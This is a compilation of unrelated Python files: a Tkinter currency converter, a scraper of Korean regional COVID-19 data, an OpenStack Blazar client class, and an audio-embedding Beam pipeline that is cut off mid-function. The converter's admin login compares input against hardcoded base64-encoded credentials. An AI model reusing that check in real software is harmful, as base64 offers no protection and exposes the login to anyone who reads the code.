outl = Label(self.canvx,text = "Output Currency Code:",bg = "light blue").place(x = 100,y = 150)
plot = Button(self.canvx,height = 1, width = 10,text = "Plot",command = self.graph_core).place(x = 200,y =250)
x = ttk.Combobox(self.canvx, textvariable = self.date, state = 'readonly', font = ('arial', 10),width = 20)
x['values'] = (2021,2020,2019,2018,2017,2016,2015,2014,2013,2012,2011,2010,2009)
x.place(x = 300 , y = 200)
Label(self.canvx,text = "Choose Year:",bg= "light blue").place(x = 100,y = 200)
def graph_core(self):# graphical analysis using matplotlib
strinpcode = str(self.inpcode.get())
stroutcode = str(self.outcode.get())
strdate = str(self.date.get())
x,y = [],[]
z = ['6','12']
fyear = int(strdate)
tyear, tmonth , tday = map(int, str(date.today()).split("-"))
if abs(fyear-tyear) > 5:
for i in range(fyear,tyear+1):
response = requests.get("https://api.ratesapi.io/api/{}-06-01?base={}&symbols={}".format(i,strinpcode,stroutcode))
data = response.json()
rate = data['rates'][stroutcode]
y.append(rate)
x.append(i)
elif abs(fyear-tyear) <=5 and abs(fyear-tyear)>1:
for i in range(fyear,tyear):
for j in 6,12:
response = requests.get("https://api.ratesapi.io/api/{}-{}-01?base={}&symbols={}".format(i,j,strinpcode,stroutcode))
data = response.json()
rate = data['rates'][stroutcode]
y.append(rate)
x.append("{}/{}".format(i,j))
elif fyear == 2021:
for i in range(1,tmonth+1):
response = requests.get("https://api.ratesapi.io/api/2021-{}-01?base={}&symbols={}".format(i,strinpcode,stroutcode))
data = response.json()
rate = data['rates'][stroutcode]
y.append(rate)
x.append("{}/{}".format(2021,i))
else :
for i in range(fyear,tyear):
for j in range(1,13):
response = requests.get("https://api.ratesapi.io/api/{}-{}-01?base={}&symbols={}".format(i,j,strinpcode,stroutcode))
data = response.json()
rate = data['rates'][stroutcode]
y.append(rate)
x.append("{}/{}".format(i,j))
hell = Tk()
hell.attributes('-topmost', True)
hell.title("{} vs {} comparision".format(strinpcode,stroutcode))
hell.geometry("500x500")
def ploti(x,y):
fig = Figure(figsize = (10, 10),dpi = 100)
plot1 = fig.add_subplot(111)
plot1.plot(x,y)
canvas = FigureCanvasTkAgg(fig, master = hell)
canvas.draw()
canvas.get_tk_widget().pack()
toolbar = NavigationToolbar2Tk(canvas,hell)
toolbar.update()
canvas.get_tk_widget().pack()
ploti(x,y)
hell.mainloop()
def main(self): # currency conversion
self.canv2 = Canvas(height= 500,width = 700, bg="light blue")
self.canv2.place(x =0,y = 85)
self.value_out = StringVar()
self.value_in = StringVar()
self.amount = StringVar()
inp = Label(self.canv2,text="INPUT CURRENCY",font = ('algerian', 15), bg="light blue")
inp.place(x = 75,y = 100)
out = Label(self.canv2,text="OUTPUT CURRENCY",font = ('algerian', 15), bg="light blue")
out.place(x = 400,y = 100)
Optionout = ttk.Combobox(self.canv2, textvariable = self.value_out, state = 'readonly', font = ('arial', 15), width = 20)
Optionout['values'] = ('GBP-Pound sterling','HKD-Hong Kong Dollar','IDR-Indonesian Rupiah','ILS-Israeli New Shekel','DKK-Danish Krone','INR-Indian rupee','CHF-Swiss Franc','MXN-Mexican peso','CZK-Czech koruna koruna česká','SGD-Singapore Dollar','THB-Thai baht','HRK-Croatian Kuna','EUR-Euro','MYR-Malaysian Ringgit','NOK-Norwegian Krone','CNY-Chinese yuan renminbi','BGN-Bulgarian Lev','PHP-Philippine peso','PLN-Polish zloty','ZAR-South African Rand','CAD-Canadian Dollar','ISK-Icelandic Króna','BRL-Brazilian real','RON-Romanian leu','NZD-New Zealand Dollar','TRY-Turkish lira','JPY-Japanese yen','RUB-Russian Ruble','KRW-South Korean won','USD-United States dollar','AUD-Australian Dollar','HUF-Hungarian Forint','SEK-Swedish Krona')
Optionout.place(x = 400 , y = 150)
Optionin = ttk.Combobox(self.canv2, textvariable = self.value_in, state = 'readonly', font = ('arial', 15), width = 20)
Optionin['values'] = ('GBP-Pound sterling','HKD-Hong Kong Dollar','IDR-Indonesian Rupiah','ILS-Israeli New Shekel','DKK-Danish Krone','INR-Indian rupee','CHF-Swiss Franc','MXN-Mexican peso','CZK-Czech koruna koruna česká','SGD-Singapore Dollar','THB-Thai baht','HRK-Croatian Kuna','EUR-Euro','MYR-Malaysian Ringgit','NOK-Norwegian Krone','CNY-Chinese yuan renminbi','BGN-Bulgarian Lev','PHP-Philippine peso','PLN-Polish zloty','ZAR-South African Rand','CAD-Canadian Dollar','ISK-Icelandic Króna','BRL-Brazilian real','RON-Romanian leu','NZD-New Zealand Dollar','TRY-Turkish lira','JPY-Japanese yen','RUB-Russian Ruble','KRW-South Korean won','USD-United States dollar','AUD-Australian Dollar','HUF-Hungarian Forint','SEK-Swedish Krona')
Optionin.place(x = 75 , y = 150)
in_field = Entry(self.canv2,bd = 1, justify =CENTER, width = 22,font =20, textvariable = self.amount)
in_field.place(x = 75 ,y = 200)
self.out_field = Label(self.canv2,bd = 1, justify =CENTER, width = 22,font =20,bg = "white") #add text output value
self.out_field.place(x = 400 ,y = 200)
convertb = Button(self.canv2,text = "CONVERT",height=2,padx = 7,activebackground="#2C84EF",command = self.convertbact)
convertb.place(x = 300, y =250)
history = Button(self.canv2,text = "RECENT", height=2,padx = 11,command = self.history)
history.place(x = 300, y =300)
caution_red = Label(self.canv2,text= "*Enter only numbers",font =('Baskerville Old Face',8),fg = "red", bg="light blue")
caution_red.place(x = 130 ,y = 230)
def convertbact(self):# storing history
inp_curr = self.value_in.get()
out_curr = self.value_out.get()
input_amount = self.amount.get()
RealTimeCurrencyConverter.convert(self,inp_curr,out_curr,input_amount)
self.out_field['text'] = self.output_amount
self.f = open('history.txt','a')
self.f.write("Input Currency Code: %s\nOutput Currency Code: %s\nInput Amount: %s\nOutput Amount: %s Time :%s\n\n" % (self.inp_code,self.out_code,float(input_amount),round(float(self.output_amount),5),datetime.now().strftime("%d/%m/%Y %H:%M:%S")))
self.f.close()
def history(self):# displaying recent conversions
self.canv3 = Canvas(height= 500,width = 700)
self.canv3.place(x =0,y = 85)
scrollbar = Scrollbar(self.canv3)
scrollbar.place(x= 750,y = 0)
mylist = Listbox(self.canv3 , yscrollcommand = scrollbar.set ,height = 20,width= 90)
f = open("history.txt",'r')
k = f.readlines()
for i in range(len(k)):
mylist.insert(END,k[i])
mylist.place(x = 30,y = 30)
scrollbar.config( command = mylist.yview )
header = Label(self.canv3,text = "YOUR RECENT TRANSACTIONS : ")
header.place(x=30,y=10)
Button(self.canv3,text = "CLEAR RECENT",command = self.clearh).place(x = 500,y = 360)
def clearh(self): # deleting stored history
f = open("history.txt",'w')
f.close()
def login(self): # admin login
e_unmae = self.uname.get().encode(encoding='UTF-8',errors='strict')
e_passw = self.passw.get().encode(encoding='UTF-8',errors='strict')
if base64.b64encode(e_unmae) == b'U1VSWUE=' and base64.b64encode(e_passw) == b'UEFTU1dPUkQ=':
self.canv4 = Canvas(height= 500,width = 700)
self.canv4.place(x =0,y = 85)
show = Label(self.canv4,bd = 1, justify =CENTER,font =20,text="YOU HAVE SUCESSFULLY LOGGED IN!!!!")
show.place(x = 200 ,y = 200)
else:
show = Label(self.canv,bd = 1, justify =CENTER,font =('Baskerville Old Face',8),fg = "red",text="Incorrect Username Or password,Try Again", bg="light blue")
show.place(x = 120,y = 230)
def ext(self): # external resources
x = []
for i in ['USD','EUR','GBP']:
response_url = "https://api.ratesapi.io/api/latest?base={}&symbols={}".format('INR', i)
response = requests.get(response_url)
data = response.json()
rates = data['rates'][i]
x.append("100 Indian Rupees = {} {}".format(rates*100,i))
self.canvz = Canvas(height= 500,width = 700, bg="light blue")
self.canvz.place(x =0,y = 85)
Label(self.canvz,text= 'Current Trends', font = ("algerian",15),bg="light blue").place(x=50,y = 20)
l = str(date.today())
stri = 'As on '+l+' \n'
for i in x :
stri = stri + i +"\n"
Label(self.canvz,text = stri ,font = ("bradley hand itc",15,'bold')).place(x=50,y = 50)
import webbrowser
def openweb1():
webbrowser.open("https://github.com/Team007s/Currency-Converter",new=1)
def openweb2():
webbrowser.open('https://www.airasia.co.in/content/air-asia/en/home',new=1)
def openweb3():
webbrowser.open("https://www.air.irctc.co.in/",new=1)
def openweb4():
webbrowser.open("https://www.goindigo.in/",new=1)
Label(self.canvz,text = "Visit Some Trusted Travel Websites in India" ,font = ("bradley hand itc",15,'bold'),bg="light blue").place(x=50,y = 200)
Button(self.canvz,text = "Check For Updates\nCurrent Version 1.1",command=openweb1).place(x=550,y=360)
Button(self.canvz,text = "1.IRCTC Air",font = ("bradley hand itc",11,'bold'),width=20, command=openweb3).place(x=100,y=250)
Button(self.canvz,text = "2.Air Asia", font =("bradley hand itc",11,'bold'),width=20,command=openweb2).place(x=100,y=300)
Button(self.canvz,text = "3.IndiGo.",font =("bradley hand itc",11,'bold'),width=20,command=openweb4).place(x=100,y=350)
###_________driver code________
if __name__ == '__main__':
App()
root.mainloop()
|
import requests
from bs4 import BeautifulSoup
from utils import write_data
def get_data(url):
html = requests.get(url).text
soup = BeautifulSoup(html, 'html.parser')
updated = soup.select('.timetable > .info > span')[0].text # 업데이트날짜
data = soup.select('.rpsa_detail > div > div')
data.pop()
return data, updated
def parse_data(data, updated):
confirmed_region = [] # 시도별확진자
for i, d in enumerate(data):
region = d.find_all('h4', class_='cityname')[0].text # 지역이름
temp = d.find_all('span', class_='num')
confirmed, _, recovered, deaths, confirmed_rate = [
element.text.replace(',', '') for element in temp]
confirmed = int(confirmed) # 확진자수
recovered = int(recovered) # 격리해제수
deaths = int(deaths) # 사망자수
confirmed_rate = float(confirmed_rate) # 십만명당발생율
if i != 0:
slicing = d.find_all('p', class_='citytit')[0].text
confirmed_region_rate = float(
slicing[:slicing.find('%')]) # 지역별확진자비율
else:
confirmed_region_rate = ''
confirmed_region.append({
'지역이름': region,
'확진자수': confirmed,
'격리해제수': recovered,
'사망자수': deaths,
'십만명당발생율': confirmed_rate,
'지역별확진자비율': confirmed_region_rate,
})
confirmed_region.append({'업데이트날짜': updated})
return confirmed_region
def run():
data, updated = get_data(
"http://ncov.mohw.go.kr/bdBoardList_Real.do?brdId=1&brdGubun=13&ncvContSeq=&contSeq=&board_id=&gubun=")
confirmed_region = parse_data(data, updated)
save_dir = './data/koreaRegionalData.js'
crawler_name = 'crawlKoreaRegionalData.py'
var_name = 'koreaRegionalData'
write_data(confirmed_region, save_dir, crawler_name, var_name)
print("#####################################")
print("############ 한국 지역별 데이터 #############")
print("######## koreaRegionalData.js #########")
run()
print("############### 완료!! ###############")
print("#####################################")
|
# Copyright (c) 2013 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from blazarclient.v1 import devices
from blazarclient.v1 import floatingips
from blazarclient.v1 import hosts
from blazarclient.v1 import leases
from blazarclient.v1 import networks
class Client(object):
"""Top level object to communicate with Blazar.
Contains managers to control requests that should be passed to each type of
resources - leases, events, etc.
**Examples**
client = Client()
client.lease.list()
client.event.list(<lease_id>)
...
"""
version = '1'
def __init__(self, blazar_url=None, auth_token=None, session=None,
**kwargs):
self.blazar_url = blazar_url
self.auth_token = auth_token
self.session = session
if not self.session:
logging.warning('Use a keystoneauth session object for the '
'authentication. The authentication with '
'blazar_url and auth_token is deprecated.')
self.lease = leases.LeaseClientManager(blazar_url=self.blazar_url,
auth_token=self.auth_token,
session=self.session,
version=self.version,
**kwargs)
self.host = hosts.ComputeHostClientManager(blazar_url=self.blazar_url,
auth_token=self.auth_token,
session=self.session,
version=self.version,
**kwargs)
self.floatingip = floatingips.FloatingIPClientManager(
blazar_url=self.blazar_url,
auth_token=self.auth_token,
session=self.session,
version=self.version,
**kwargs)
self.network = networks.NetworkClientManager(
blazar_url=self.blazar_url,
auth_token=self.auth_token,
session=self.session,
version=self.version,
**kwargs)
self.device = devices.DeviceClientManager(
blazar_url=self.blazar_url,
auth_token=self.auth_token,
session=self.session,
version=self.version,
**kwargs)
|
# coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
r"""Construct a beam pipeline to map from audio to embeddings.
This file has two modes:
1) Map from tf.Examples of audio to tf.Examples of embeddings.
2) Map from TFDS dataseet to tf.Examples of embeddings.
It supports using a tf.hub module OR a TFLite model file to generate embeddings.
TFLite file should have the `.tflite` extension.
"""
import copy
import numbers
import os
import random
from typing import Any, Callable, Dict, Iterator, List, Optional, Tuple, Union
from absl import flags
from absl import logging
import apache_beam as beam
import librosa
import numpy as np
import tensorflow as tf
import tensorflow_datasets as tfds
import tensorflow_hub as hub
from non_semantic_speech_benchmark.export_model import tf_frontend
KEY_FIELD = 'key_adhoc'
FLAGS = flags.FLAGS
def _maybe_add_commas(list_obj, comma_escape_char):
return [x.replace(comma_escape_char, ',') for x in list_obj]
def get_beam_params_from_flags(
):
"""Parses flags and returns arguments for beam job."""
# Get input data location from flags. If we're reading a TFDS dataset, get
# train, validation, and test.
input_filenames_list, output_filenames, sample_rate = read_input_glob_and_sample_rate_from_flags(
FLAGS.input_glob, FLAGS.sample_rate, FLAGS.tfds_dataset,
FLAGS.output_filename, FLAGS.tfds_data_dir)
# Sometimes we want commas to appear in `embedding_modules`,
# `embedding_names`, or `module_output_key`. However, commas get split out in
# Google's Python `DEFINE_list`. We compromise by introducing a special
# character, which we replace with commas here.
embedding_modules = _maybe_add_commas(FLAGS.embedding_modules,
FLAGS.comma_escape_char)
embedding_names = _maybe_add_commas(FLAGS.embedding_names,
FLAGS.comma_escape_char)
module_output_keys = _maybe_add_commas(FLAGS.module_output_keys,
FLAGS.comma_escape_char)
input_format = 'tfrecord'
output_format = 'tfrecord'
# All modules should be tflite or not tflite.
tflite = [x.endswith('.tflite') for x in embedding_modules]
if not np.all(tflite) and np.any(tflite):
raise ValueError(
f'Modules must all be tflite, or none: {embedding_modules}')
is_tflite = np.any(tflite)
logging.info('is_tflite: %s', is_tflite)
# pylint:disable=line-too-long
beam_params = dict(
sample_rate=sample_rate,
debug=FLAGS.debug,
embedding_names=embedding_names,
embedding_modules=embedding_modules,
module_output_keys=module_output_keys,
audio_key=FLAGS.audio_key,
sample_rate_key=FLAGS.sample_rate_key,
label_key=FLAGS.label_key,
speaker_id_key=FLAGS.speaker_id_key,
average_over_time=FLAGS.average_over_time,
delete_audio_from_output=FLAGS.delete_audio_from_output,
split_embeddings_into_separate_tables=FLAGS.split_embeddings_into_separate_tables,
use_frontend_fn=FLAGS.use_frontend_fn,
normalize_to_pm_one=FLAGS.normalize_to_pm_one,
model_input_min_length=FLAGS.model_input_min_length,
input_format=input_format,
output_format=output_format,
module_call_fn=(samples_to_embedding_tflite if is_tflite
else samples_to_embedding_tfhub),
setup_fn=build_tflite_interpreter if is_tflite else hub.load,
)
# pylint:enable=line-too-long
logging.info('input_filenames_list: %s', input_filenames_list)
logging.info('output_filenames: %s', output_filenames)
return input_filenames_list, output_filenames, beam_params
# Some inference functions, such as for `TFHub` and `TFLite` formats.
def samples_to_embedding_tfhub(
model_input,
sample_rate,
mod, # pylint:disable=g-bare-generic
output_key,
name):
"""Run inference to map a single audio sample to an embedding."""
logging.info('[%s] Module input shape: %s', name, model_input.shape)
# Some modules have signatures. If they do, they should only have one valid
# signature, and we should use that one. Otherwise, raise an error.
if callable(mod):
logging.info('[%s] is callable.', name)
sig = None
else:
logging.info('[%s] has signatures.', name)
if not hasattr(mod, 'signatures'):
raise ValueError(f'[{name}] Not callable and no signatures.')
if not mod.signatures:
raise ValueError(f'[{name}] Expected signatures, but they were empty.')
all_sigs = [s for s in mod.signatures if not s.startswith('_')]
valid_sigs = [s for s in all_sigs if not s.startswith('_')]
if len(valid_sigs) != 1:
raise ValueError(
f'[{name}] Didn\'t find exactly one valid signature: {all_sigs}')
sig = valid_sigs[0]
logging.info('[%s] Using signatures, and found: %s', name, sig)
# Models either take 2 args (input, sample_rate) or 1 arg (input).
# The first argument is either 1 dimensional (samples) or 2 dimensional
# (batch, samples).
# Try all. Order here matters. We must try "2 args" before "1 arg", otherwise
# models that use sample rate might ignore it.
errors = [] # Track errors. Display if none of them work.
tf_out = None
for num_args, add_batch_dim in [(2, False), (1, False), (2, True), (1, True)]:
cur_model_input = (tf.expand_dims(model_input, 0) if add_batch_dim
else model_input)
func_args = ((cur_model_input,) if num_args == 1 else
(cur_model_input, sample_rate))
try:
if sig:
tf_out = mod.signatures[sig](*func_args)
else:
tf_out = mod(*func_args)
except (ValueError, TypeError,
tf.errors.InvalidArgumentError) as e:
# Track errors and print them only if none of the expected signatures
# work.
errors.append(e)
continue
logging.info('[%s] Succeeded with num args %i, add_batch_dim %s', name,
num_args, add_batch_dim)
break
if tf_out is None:
raise ValueError(f'[{name}] None of the signatures worked: {errors}')
if isinstance(tf_out, dict):
if output_key not in tf_out:
raise ValueError(
f'[{name}] Key not recognized: "{output_key}" vs {tf_out.keys()}')
ret = tf_out[output_key]
else:
ret = tf_out
ret = np.array(ret)
if ret.ndim > 2:
# Batch-flatten in numpy.
ret = np.reshape(ret, [ret.shape[0], -1])
return ret
def samples_to_embedding_tflite(model_input, sample_rate,
interpreter,
output_key, name):
"""Run TFLite inference to map audio samples to an embedding."""
if model_input.ndim == 1:
model_input = np.expand_dims(model_input, axis=0)
input_details = interpreter.get_input_details()
output_details = interpreter.get_output_details()
# Resize TFLite input size based on length of sample.
# Ideally, we should explore if we can use fixed-size input here, and
# tile the sample to meet TFLite input size.
if not np.array_equal(model_input.shape, input_details[0]['shape']):
logging.info('[%s] TFLite input, actual vs expected: %s vs %s', name,
model_input.shape, input_details[0]['shape'])
interpreter.resize_tensor_input(input_details[0]['index'], model_input.shape)
interpreter.allocate_tensors()
interpreter.set_tensor(input_details[0]['index'], model_input)
# Models either take 2 args (input, sample_rate) or 1 arg (input). Try both.
if len(input_details) > 1:
interpreter.set_tensor(input_details[1]['index'],
np.array(sample_rate).astype(np.int32))
interpreter.invoke()
embedding_2d = interpreter.get_tensor(
output_details[int(output_key)]['index'])
return np.array(embedding_2d, dtype=np.float32)
# Setup functions. `TFLite` requires special code, but `TFHub` is trivial.
def build_tflite_interpreter(tflite_model_path):
model_content = None
with tf.io.gfile.GFile(tflite_model_path, 'rb') as model_file:
model_content = model_file.read()
interpreter = tf.lite.Interpreter(model_content=model_content)
interpreter.allocate_tensors()
return interpreter
def tfexample_audio_to_npfloat32(ex, audio_key,
normalize_to_pm_one):
"""Extract audio from tf.Example and convert it to np.float32."""
audio_feats = ex.features.feature[audio_key]
iinfo = np.iinfo(np.int16)
if audio_feats.int64_list.value:
audio = np.array(audio_feats.int64_list.value)
# Even though the data is in an int64 container, the data is actually int16.
if np.logical_or(audio < iinfo.min, audio > iinfo.max).any():
raise ValueError(
f'Audio doesn\'t conform to int16: {np.min(audio)}, {np.max(audio)}')
audio = audio.astype(np.float32)
if normalize_to_pm_one:
audio /= iinfo.max
else:
assert audio_feats.float_list.value
audio = np.array(audio_feats.float_list.value, dtype=np.float32)
if not normalize_to_pm_one:
audio *= iinfo.max
return audio
def _default_feature_fn(samples, sample_rate):
frontend_args = tf_frontend.frontend_args_from_flags()
feats = tf_frontend.compute_frontend_features(
samples, sample_rate, **frontend_args)
logging.info('Feats shape: %s', feats.shape)
return tf.expand_dims(feats, axis=-1).numpy().astype(np.float32)
@beam.typehints.with_input_types(Tuple[str, tf.train.Example])
@beam.typehints.with_output_types(Tuple[str, np.ndarray])
class ComputeEmbeddingMapFn(beam.DoFn):
"""Computes an embedding (key, tf.Example) from audio (key, tf.Example)."""
def __init__(
self,
name,
module,
output_key,
audio_key,
sample_rate_key,
sample_rate,
average_over_time,
feature_fn = None,
normalize_to_pm_one = True,
model_input_min_length = None,
target_sample_rate = 16000,
module_call_fn = samples_to_embedding_tfhub,
setup_fn = hub.load):
self._name = name
# If TFLite should be used, `module` should point to a flatbuffer model.
self._module = module
# For TFLite, `output_key` is the index of the embedding output from TFLite
# model (Usually 0).
self._output_key = output_key
self._audio_key = audio_key
self._sample_rate_key = sample_rate_key
self._sample_rate = sample_rate
self._average_over_time = average_over_time
self._feature_fn = feature_fn
self._normalize_to_pm_one = normalize_to_pm_one
self._model_input_min_length = model_input_min_length
self._target_sample_rate = target_sample_rate
self._module_call_fn = module_call_fn
self._setup_fn = setup_fn
# Only one of `sample_rate_key` and `sample_rate` should be not None.
if not (self._sample_rate_key is None) ^ (self._sample_rate is None):
raise ValueError('Must have exactly one sample_rate_key or sample_rate: '
f'{self._sample_rate_key} vs {self._sample_rate}')
def setup(self):
self.post_setup_module = self._setup_fn(self._module)
def read_audio_from_tfexample(self,
ex,
k,
normalize_to_pm_one = True):
"""Reads the audio samples from a tf.Example, and assert input sanity."""
if self._audio_key not in ex.features.feature:
raise ValueError(f'Audio key `{self._audio_key}` not found: '
f'{list(ex.features.feature.keys())}')
audio = tfexample_audio_to_npfloat32(ex, self._audio_key,
normalize_to_pm_one)
assert audio.ndim == 1, audio.ndim
if audio.size == 0:
raise ValueError(f'No audio found: {self._audio_key}, {audio.size} {k}')
beam.metrics.Metrics.distribution(
'computed-embedding-audio', 'length').update(audio.size)
return audio
def read_sample_rate_from_tfexample(self, ex):
"""Reads the sample rate from a tf.Example."""
if self._sample_rate_key:
if self._sample_rate_key not in ex.features.feature:
raise ValueError(f'Sample rate key not found: {self._sample_rate_key}')
sr_feat = ex.features.feature[self._sample_rate_key]
# Use `sample_rate` in `float_list` or `int64_list`. Either way, convert
# to an integer for downstream use.
if not len(sr_feat.float_list.value) ^ len(sr_feat.int64_list.value):
raise ValueError(
f'Expected exactly one of `float_list` and `int64_list`: {sr_feat}')
if sr_feat.float_list.value:
sample_rate = int(sr_feat.float_list.value[0])
else:
sample_rate = sr_feat.int64_list.value[0]
else:
if not self._sample_rate:
raise ValueError('If `sample_rate_key` not provided, must provide '
'`sample_rate`.')
sample_rate = self._sample_rate
return sample_rate
def resample(self, audio, sample_rate,
target_sr):
"""Resample audio to target."""
return librosa.core.resample(
audio, orig_sr=sample_rate, target_sr=target_sr, res_type='kaiser_best')
def audio_to_features(self, audio,
sample_rate):
"""Convert audio to features, if required."""
if self._feature_fn:
model_input = self._feature_fn(audio, sample_rate)
if not isinstance(model_input, np.ndarray):
raise ValueError(f'Expected ndarray, got {type(model_input)}')
if model_input.dtype != np.float32:
raise ValueError(f'Should be float32, was: {model_input.dtype}')
else:
model_input = audio
if self._model_input_min_length and model_input.size < self._model_input_min_length:
delta = self._model_input_min_length - model_input.size
model_input = np.pad(model_input, [0, delta], mode='symmetric')
logging.info('`model_input` shape is: %s', model_input.shape)
return model_input
def process(
self, k_v):
k, ex = k_v
# Read the input example audio and assert input format sanity.
audio = self.read_audio_from_tfexample(
ex, k, normalize_to_pm_one=self._normalize_to_pm_one)
# Read the sample rate, if a key to do so has been provided.
sample_rate = self.read_sample_rate_from_tfexample(ex)
logging.info('len(audio): %s / %s / %s', len(audio), sample_rate,
self._name)
# Resample, if necessary.
if sample_rate != self._target_sample_rate:
audio = self.resample(
audio, sample_rate, target_sr=self._target_sample_rate)
sample_rate = self._target_sample_rate
# Convert audio to features, if required.
model_input = self.audio_to_features(audio, sample_rate)
# Calculate the 2D embedding.
embedding_2d = self._module_call_fn(
model_input, sample_rate, self.post_setup_module, self._output_key,
self._name)
if not isinstance(embedding_2d, np.ndarray):
raise ValueError(f'`embedding_2d` wrong type: {type(embedding_2d)}')
if embedding_2d.ndim != 2:
raise ValueError(f'`embedding_2d` wrong dims: {embedding_2d.ndim}')
if embedding_2d.dtype != np.float32:
raise ValueError(f'`embedding_2d` wrong type: {embedding_2d.dtype}')
logging.info('[%s] `embedding_2d` shape: %s', self._name,
embedding_2d.shape)
beam.metrics.Metrics.counter('computed-embedding', self._name).inc()
beam.metrics.Metrics.distribution(f'computed-embedding-{self._name}',
'length').update(embedding_2d.shape[0])
# Average over time, if required.
if self._average_over_time:
embedding = np.mean(embedding_2d, axis=0, keepdims=True)
else:
embedding = embedding_2d
yield (k, embedding)
def _add_embedding_to_tfexample(ex, embedding,
name):
"""Add a 2D embedding to a tf.train.Example."""
# Store the embedding 2D shape and store the 1D embedding. The original
# embedding can be recovered with `emb.reshape(feature['shape'])`.
f = ex.features.feature[f'{name}/shape']
f.int64_list.value.extend(embedding.shape)
f = ex.features.feature[name]
f.float_list.value.extend(embedding.reshape([-1]))
return ex
def add_key_to_audio(ex,
audio_key,
key_field = KEY_FIELD):
"""Add hash of audio to tf.Example."""
if key_field in ex.features.feature:
raise ValueError(f'`{key_field}` is protected, can\'t be in tf.Train.')
# Compute the key.
# Note: Computing the key from the audio means keys won't be preserved when
# chunking audio.
samples = tfexample_audio_to_npfloat32(
ex, audio_key, normalize_to_pm_one=True)
samples = samples[:16000]
key = round(np.mean(samples), 5) # Round so it's stable.
key = str(key).encode('utf-8')
# Add the key to the tf.Example.
ex.features.feature[key_field].bytes_list.value.append(key)
return ex
def _add_embedding_column_map_fn(
k_v,
original_example_key,
delete_audio_from_output,
audio_key,
label_key,
speaker_id_key):
"""Combine a dictionary of named embeddings with a tf.train.Example."""
k, v_dict = k_v
if original_example_key not in v_dict:
raise ValueError(
f'Original key not found: {original_example_key} vs {v_dict.keys()}')
ex_l = v_dict[original_example_key]
assert len(ex_l) == 1, (len(ex_l), k_v[0], ex_l)
ex = copy.deepcopy(ex_l[0]) # Beam does not allow modifying the input.
assert isinstance(ex, tf.train.Example), type(ex)
for name, embedding_l in v_dict.items():
if name == original_example_key:
continue
assert len(embedding_l) == 1, embedding_l
embedding = embedding_l[0]
assert isinstance(embedding, np.ndarray)
assert embedding.ndim == 2, embedding.ndim
# Store the embedding 2D shape and store the 1D embedding. The original
# embedding can be recovered with `emb.reshape(feature['shape'])`.
ex = _add_embedding_to_tfexample(ex, embedding, f'embedding/{name}')
# Add the hash of the audio as a key.
ex = add_key_to_audio(ex, audio_key)
if delete_audio_from_output:
ex.features.feature.pop(audio_key, None)
# Assert that the label is present. If it's a integer, convert it to bytes.
if label_key:
if label_key not in ex.features.feature:
raise ValueError(f'Label not found: {label_key} vs {ex.features.feature}')
lbl_feat = ex.features.feature[label_key]
if lbl_feat.int64_list.value:
lbl_val_as_bytes = str(lbl_feat.int64_list.value[0]).encode('utf-8')
ex.features.feature.pop(label_key, None)
ex.features.feature[label_key].bytes_list.value.append(lbl_val_as_bytes)
# If provided, assert that the speaker_id field is present, and of type
# `bytes`.
if speaker_id_key:
feats = ex.features.feature
assert speaker_id_key in feats, (speaker_id_key, feats.keys())
assert feats[speaker_id_key].bytes_list.value, feats[speaker_id_key]
return k, ex
def _tfds_filenames(dataset_name,
split_name,
data_dir = None):
"""Returns filenames for a TFDS dataset."""
data_dir = tfds.builder(dataset_name, data_dir=data_dir).data_dir
return [os.path.join(data_dir, x) for x in
tfds.builder(dataset_name).info.splits[split_name].filenames]
def _tfds_sample_rate(dataset_name, data_dir = None):
return tfds.builder(dataset_name, data_dir=data_dir).info.features[
'audio'].sample_rate
def read_input_glob_and_sample_rate_from_flags(
input_glob_flag, sample_rate_flag, tfds_dataset_flag,
output_filename_flag,
tfds_data_dir_flag):
"""Read flags for input data and sample rate.
Args:
input_glob_flag: String flag. The input file glob.
sample_rate_flag: String flag. The sample rate.
tfds_dataset_flag: String flag. The TFDS dataset.
output_filename_flag: String flag. The output filename.
tfds_data_dir_flag: String flag. Optional location of local TFDS data.
Returns:
(input_filenames, output_filenames, sample_rate)
`input_filenames` is a list of list of filenames. `output_filenames` is a
list of the same length.
"""
if input_glob_flag:
if not tf.io.gfile.glob(input_glob_flag):
raise ValueError(f'Files not found: {input_glob_flag}')
if tfds_data_dir_flag:
raise ValueError(
f'`tfds_data_dir_flag` should be None: {tfds_data_dir_flag}')
input_filenames = [tf.io.gfile.glob(input_glob_flag)]
output_filenames = [output_filename_flag]
sample_rate = int(sample_rate_flag)
else:
assert tfds_dataset_flag
dataset_name = tfds_dataset_flag
# Download dataset, if necessary.
tfds.load(dataset_name, data_dir=tfds_data_dir_flag)
sample_rate = _tfds_sample_rate(dataset_name, tfds_data_dir_flag)
if not sample_rate:
raise ValueError(f'Must have sample rate: {sample_rate}')
input_filenames = []
output_filenames = []
for split_name in ('train', 'validation', 'test'):
input_filenames.append(
_tfds_filenames(dataset_name, split_name, tfds_data_dir_flag))
output_filenames.append(output_filename_flag + f'.{split_name}')
logging.info('TFDS input filenames: %s', input_filenames)
logging.info('sample rate: %s', sample_rate)
if sample_rate and not isinstance(sample_rate, numbers.Number):
raise ValueError(f'Sample rate must be number: {type(sample_rate)}')
for filename_list in input_filenames:
for filename in filename_list:
if not tf.io.gfile.exists(filename):
raise ValueError(f'File doesn\'t exist: {filename}')
if len(input_filenames) != len(output_filenames):
raise ValueError('Lengths not equal.')
logging.info('input_filenames: %s', input_filenames)
logging.info('output_filenames: %s', output_filenames)
return input_filenames, output_filenames, sample_rate
def validate_inputs(input_filenames_list,
output_filenames, embedding_modules,
embedding_names, module_output_keys):
"""Validate inputs and input flags."""
for filename_list in input_filenames_list:
for filename in filename_list:
# It's either a filename or a glob. Try both.
try:
if not tf.io.gfile.exists(filename):
raise ValueError(f'Files not found: {filename}')
except (tf.errors.InvalidArgumentError, ValueError): # was a glob.
if not tf.io.gfile.glob(filename):
